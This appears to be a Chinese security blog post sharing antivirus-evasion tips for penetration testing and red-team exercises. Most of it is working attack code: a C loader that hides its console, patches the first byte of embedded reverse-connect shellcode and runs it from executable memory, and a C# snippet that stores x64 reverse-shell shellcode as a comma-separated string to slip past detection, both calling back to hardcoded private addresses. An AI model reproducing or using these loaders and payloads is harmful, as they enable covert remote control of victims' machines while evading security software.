免杀 TIPS

地球胖头鱼 2021-01-07
Web安全 发布于 2021-01-07 16:23:12 阅读 337 评论 0

最近在网上看文章,很多护网的时候或者在渗透测试过程中没有一个好的Tips就很尴尬了,我这里找了几个稍微有点老的Tips,该方法就是抛砖引玉,为什么这么说呢,应为本身都是一些老方法,作用大不大还是要看用在什么地方。原理就是更改shellcode前几位,然后加载时重置。废话不多说了直接上代码。

第一个

#include "windows.h"

int main(int argc,char * argv[]) {

  ::ShowWindow(::GetConsoleWindow(),SW_HIDE);

  unsigned char shellcode[]=  "\xfe\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
    "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
    "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
    "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
    "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
    "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
    "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
    "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
    "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
    "\x8d\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c"
    "\x77\x26\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\x68\x3a\x56"
    "\x79\xa7\xff\xd5\x53\x53\x6a\x03\x53\x53\x68\xb3\x15\x00\x00"
    "\xe8\x6a\x01\x00\x00\x2f\x57\x65\x56\x69\x48\x48\x4e\x41\x6f"
    "\x4f\x51\x36\x76\x54\x75\x38\x59\x37\x52\x73\x4d\x41\x38\x68"
    "\x72\x6a\x33\x30\x67\x39\x42\x41\x6c\x42\x35\x66\x45\x68\x33"
    "\x66\x2d\x65\x68\x69\x6e\x46\x42\x33\x45\x4d\x59\x59\x79\x7a"
    "\x46\x34\x53\x34\x6c\x50\x74\x4f\x57\x6a\x4e\x63\x46\x6b\x6f"
    "\x73\x47\x6e\x70\x53\x50\x53\x6e\x33\x64\x73\x53\x7a\x6e\x2d"
    "\x41\x2d\x50\x56\x39\x74\x2d\x6f\x58\x4f\x56\x45\x30\x47\x55"
    "\x61\x63\x34\x61\x41\x68\x42\x53\x67\x57\x58\x69\x6c\x71\x52"
    "\x33\x6b\x6b\x59\x59\x56\x63\x42\x4d\x37\x75\x79\x4f\x70\x38"
    "\x45\x5f\x4d\x70\x44\x30\x35\x39\x4b\x4b\x6b\x4b\x49\x6c\x6a"
    "\x48\x51\x50\x2d\x4d\x32\x75\x64\x4e\x58\x47\x63\x51\x35\x5a"
    "\x4b\x49\x41\x42\x43\x59\x6f\x55\x72\x53\x77\x34\x4e\x59\x35"
    "\x48\x46\x41\x49\x78\x63\x63\x41\x69\x73\x6c\x43\x4c\x44\x76"
    "\x57\x5f\x77\x64\x32\x67\x39\x68\x4d\x51\x54\x31\x39\x50\x50"
    "\x50\x53\x41\x41\x4f\x51\x55\x6b\x68\x4e\x63\x56\x46\x7a\x2d"
    "\x4c\x4a\x47\x38\x52\x58\x38\x61\x6f\x4c\x6b\x2d\x4b\x34\x77"
    "\x46\x48\x72\x00\x50\x68\x57\x89\x9f\xc6\xff\xd5\x89\xc6\x53"
    "\x68\x00\x02\x60\x84\x53\x53\x53\x57\x53\x56\x68\xeb\x55\x2e"
    "\x3b\xff\xd5\x96\x6a\x0a\x5f\x53\x53\x53\x53\x56\x68\x2d\x06"
    "\x18\x7b\xff\xd5\x85\xc0\x75\x14\x68\x88\x13\x00\x00\x68\x44"
    "\xf0\x35\xe0\xff\xd5\x4f\x75\xe1\xe8\x4c\x00\x00\x00\x6a\x40"
    "\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x53\x68\x58\xa4\x53"
    "\xe5\xff\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53"
    "\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xcf\x8b\x07\x01"
    "\xc3\x85\xc0\x75\xe5\x58\xc3\x5f\xe8\x7f\xff\xff\xff\x31\x39"
    "\x32\x2e\x31\x36\x38\x2e\x31\x31\x34\x2e\x31\x34\x30\x00\xbb"
    "\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";

  char fisrt[] = "\xfc";
  void *exec = VirtualAlloc(0,sizeof shellcode,MEM_COMMIT,PAGE_EXECUTE_READWRITE);

  memcpy(shellcode,fisrt,1);
  memcpy(exec, shellcode, sizeof shellcode);

  ((void(*)())exec)();

  return 0;
}

第二个

继上一个之后,第二个tips:

常见的Csharp的shellcode如下:

byte[] X_Final = new byte[] { 0xfc ,0x48 ,0x83 ,0xe4 ,0xf0 ,0xe8 ,0xcc ,0x00 ,0x00 ,0x00 ,0x41 ,0x51 ,0x41 , 0x50 ,0x52 ,0x51 ,0x56 ,0x48 ,0x31 ,0xd2 ,0x65 ,0x48 ,0x8b ,0x52 ,0x60 ,0x48 ,0x8b ,0x52 ,0x18 ,0x48 ,0x8b , 0x52 ,0x20 ,0x48 ,0x8b ,0x72 ,0x50 ,0x48 ,0x0f ,0xb7 ,0x4a ,0x4a ,0x4d ,0x31 ,0xc9 ,0x48 ,0x31 ,0xc0 ,0xac , 0x3c ,0x61 ,0x7c ,0x02 ,0x2c ,0x20 ,0x41 ,0xc1 ,0xc9 ,0x0d ,0x41 ,0x01 ,0xc1 ,0xe2 ,0xed ,0x52 ,0x41 ,0x51 , 0x48 ,0x8b ,0x52 ,0x20 ,0x8b ,0x42 ,0x3c ,0x48 ,0x01 ,0xd0 ,0x66 ,0x81 ,0x78 ,0x18 ,0x0b ,0x02 ,0x0f ,0x85 , 0x72 ,0x00 ,0x00 ,0x00 ,0x8b ,0x80 ,0x88 ,0x00 ,0x00 ,0x00 ,0x48 ,0x85 ,0xc0 ,0x74 ,0x67 ,0x48 ,0x01 ,0xd0 , 0x50 ,0x8b ,0x48 ,0x18 ,0x44 ,0x8b ,0x40 ,0x20 ,0x49 ,0x01 ,0xd0 ,0xe3 ,0x56 ,0x48 ,0xff ,0xc9 ,0x41 ,0x8b , 0x34 ,0x88 ,0x48 ,0x01 ,0xd6 ,0x4d ,0x31 ,0xc9 ,0x48 ,0x31 ,0xc0 ,0xac ,0x41 ,0xc1 ,0xc9 ,0x0d ,0x41 ,0x01 , 0xc1 ,0x38 ,0xe0 ,0x75 ,0xf1 ,0x4c ,0x03 ,0x4c ,0x24 ,0x08 ,0x45 ,0x39 ,0xd1 ,0x75 ,0xd8 ,0x58 ,0x44 ,0x8b , 0x40 ,0x24 ,0x49 ,0x01 ,0xd0 ,0x66 ,0x41 ,0x8b ,0x0c ,0x48 ,0x44 ,0x8b ,0x40 ,0x1c ,0x49 ,0x01 ,0xd0 ,0x41 , 0x8b ,0x04 ,0x88 ,0x48 ,0x01 ,0xd0 ,0x41 ,0x58 ,0x41 ,0x58 ,0x5e ,0x59 ,0x5a ,0x41 ,0x58 ,0x41 ,0x59 ,0x41 , 0x5a ,0x48 ,0x83 ,0xec ,0x20 ,0x41 ,0x52 ,0xff ,0xe0 ,0x58 ,0x41 ,0x59 ,0x5a ,0x48 ,0x8b ,0x12 ,0xe9 ,0x4b , 0xff ,0xff ,0xff ,0x5d ,0x49 ,0xbe ,0x77 ,0x73 ,0x32 ,0x5f ,0x33 ,0x32 ,0x00 ,0x00 ,0x41 ,0x56 ,0x49 ,0x89 , 0xe6 ,0x48 ,0x81 ,0xec ,0xa0 ,0x01 ,0x00 ,0x00 ,0x49 ,0x89 ,0xe5 ,0x49 ,0xbc ,0x02 ,0x00 ,0x11 ,0x5c ,0xc0 , 0xa8 ,0x25 ,0x81 ,0x41 ,0x54 ,0x49 ,0x89 ,0xe4 ,0x4c ,0x89 ,0xf1 ,0x41 ,0xba ,0x4c ,0x77 ,0x26 ,0x07 ,0xff , 0xd5 ,0x4c ,0x89 ,0xea ,0x68 ,0x01 ,0x01 ,0x00 ,0x00 ,0x59 ,0x41 ,0xba ,0x29 ,0x80 ,0x6b ,0x00 ,0xff ,0xd5 , 0x6a ,0x05 ,0x41 ,0x5e ,0x50 ,0x50 ,0x4d ,0x31 ,0xc9 ,0x4d ,0x31 ,0xc0 ,0x48 ,0xff ,0xc0 ,0x48 ,0x89 ,0xc2 , 0x48 ,0xff ,0xc0 ,0x48 ,0x89 ,0xc1 ,0x41 ,0xba ,0xea ,0x0f ,0xdf ,0xe0 ,0xff ,0xd5 ,0x48 ,0x89 ,0xc7 ,0x6a , 0x10 ,0x41 ,0x58 ,0x4c ,0x89 ,0xe2 ,0x48 ,0x89 ,0xf9 ,0x41 ,0xba ,0x99 ,0xa5 ,0x74 ,0x61 ,0xff ,0xd5 ,0x85 , 0xc0 ,0x74 ,0x0a ,0x49 ,0xff ,0xce ,0x75 ,0xe5 ,0xe8 ,0x93 ,0x00 ,0x00 ,0x00 ,0x48 ,0x83 ,0xec ,0x10 ,0x48 , 0x89 ,0xe2 ,0x4d ,0x31 ,0xc9 ,0x6a ,0x04 ,0x41 ,0x58 ,0x48 ,0x89 ,0xf9 ,0x41 ,0xba ,0x02 ,0xd9 ,0xc8 ,0x5f , 0xff ,0xd5 ,0x83 ,0xf8 ,0x00 ,0x7e ,0x55 ,0x48 ,0x83 ,0xc4 ,0x20 ,0x5e ,0x89 ,0xf6 ,0x6a ,0x40 ,0x41 ,0x59 , 0x68 ,0x00 ,0x10 ,0x00 ,0x00 ,0x41 ,0x58 ,0x48 ,0x89 ,0xf2 ,0x48 ,0x31 ,0xc9 ,0x41 ,0xba ,0x58 ,0xa4 ,0x53 , 0xe5 ,0xff ,0xd5 ,0x48 ,0x89 ,0xc3 ,0x49 ,0x89 ,0xc7 ,0x4d ,0x31 ,0xc9 ,0x49 ,0x89 ,0xf0 ,0x48 ,0x89 ,0xda , 0x48 ,0x89 ,0xf9 ,0x41 ,0xba ,0x02 ,0xd9 ,0xc8 ,0x5f ,0xff ,0xd5 ,0x83 ,0xf8 ,0x00 ,0x7d ,0x28 ,0x58 ,0x41 , 0x57 ,0x59 ,0x68 ,0x00 ,0x40 ,0x00 ,0x00 ,0x41 ,0x58 ,0x6a ,0x00 ,0x5a ,0x41 ,0xba ,0x0b ,0x2f ,0x0f ,0x30 , 0xff ,0xd5 ,0x57 ,0x59 ,0x41 ,0xba ,0x75 ,0x6e ,0x4d ,0x61 ,0xff ,0xd5 ,0x49 ,0xff ,0xce ,0xe9 ,0x3c ,0xff , 0xff ,0xff ,0x48 ,0x01 ,0xc3 ,0x48 ,0x29 ,0xc6 ,0x48 ,0x85 ,0xf6 ,0x75 ,0xb4 ,0x41 ,0xff ,0xe7 ,0x58 ,0x6a , 0x00 ,0x59 ,0x49 ,0xc7 ,0xc2 ,0xf0 ,0xb5 ,0xa2 ,0x56 ,0xff ,0xd5 }; 

将其转换为String

  string payload = "fc,48,83,e4,f0,e8,cc,00,00,00,41,51,41,50,52,51,56,48,31,d2,65,48,8b,52,60,48,8b,52,18,48,8b,52,20,48,8b,72,50 ,48,0f,b7,4a,4a,4d,31,c9,48,31,c0,ac,3c,61,7c,02,2c,20,41,c1,c9,0d,41,01,c1,e2,ed,52,41,51,48,8b,52,20,8b,42,3c ,48,01,d0,66,81,78,18,0b,02,0f,85,72,00,00,00,8b,80,88,00,00,00,48,85,c0,74,67,48,01,d0,50,8b,48,18,44,8b,40,20 ,49,01,d0,e3,56,48,ff,c9,41,8b,34,88,48,01,d6,4d,31,c9,48,31,c0,ac,41,c1,c9,0d,41,01,c1,38,e0,75,f1,4c,03,4c,24 ,08,45,39,d1,75,d8,58,44,8b,40,24,49,01,d0,66,41,8b,0c,48,44,8b,40,1c,49,01,d0,41,8b,04,88,48,01,d0,41,58,41,58 ,5e,59,5a,41,58,41,59,41,5a,48,83,ec,20,41,52,ff,e0,58,41,59,5a,48,8b,12,e9,4b,ff,ff,ff,5d,49,be,77,73,32,5f,33 ,32,00,00,41,56,49,89,e6,48,81,ec,a0,01,00,00,49,89,e5,49,bc,02,00,11,5c,c0,a8,25,81,41,54,49,89,e4,4c,89,f1,41 ,ba,4c,77,26,07,ff,d5,4c,89,ea,68,01,01,00,00,59,41,ba,29,80,6b,00,ff,d5,6a,05,41,5e,50,50,4d,31,c9,4d,31,c0,48 ,ff,c0,48,89,c2,48,ff,c0,48,89,c1,41,ba,ea,0f,df,e0,ff,d5,48,89,c7,6a,10,41,58,4c,89,e2,48,89,f9,41,ba,99,a5,74 ,61,ff,d5,85,c0,74,0a,49,ff,ce,75,e5,e8,93,00,00,00,48,83,ec,10,48,89,e2,4d,31,c9,6a,04,41,58,48,89,f9,41,ba,02 ,d9,c8,5f,ff,d5,83,f8,00,7e,55,48,83,c4,20,5e,89,f6,6a,40,41,59,68,00,10,00,00,41,58,48,89,f2,48,31,c9,41,ba,58 ,a4,53,e5,ff,d5,48,89,c3,49,89,c7,4d,31,c9,49,89,f0,48,89,da,48,89,f9,41,ba,02,d9,c8,5f,ff,d5,83,f8,00,7d,28,58 ,41,57,59,68,00,40,00,00,41,58,6a,00,5a,41,ba,0b,2f,0f,30,ff,d5,57,59,41,ba,75,6e,4d,61,ff,d5,49,ff,ce,e9,3c,ff ,ff,ff,48,01,c3,48,29,c6,48,85,f6,75,b4,41,ff,e7,58,6a,00,59,49,c7,c2,f0,b5,a2,56,ff,d5";

然后加载:

string[] Xpayload = payload.Split(','); 
    byte[] X_Final = new byte[Xpayload.Length];            
    for (int i = 0; i < Xpayload.Length; i++){               
         X_Final[i] = Convert.ToByte(Xpayload[i], 16);            
  }   

其他的自行补充即可,这些都可以过一些简单的免杀,国外的一些未测,有兴趣的可以去试试。有什么错误请大家指正。

本作品采用《CC 协议》,转载必须注明作者和本文链接
讨论数量: 0
(= ̄ω ̄=)··· 暂无内容!
请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!
地球胖头鱼
未填写
  • 作者发布文章252
  • 作者收获粉丝10
  • 作者收到点赞3
  • 所有文章被收藏了5
  • 博客总访问量排行第2
  • 博客总访问量8.9 万(每日更新)
查看所有博文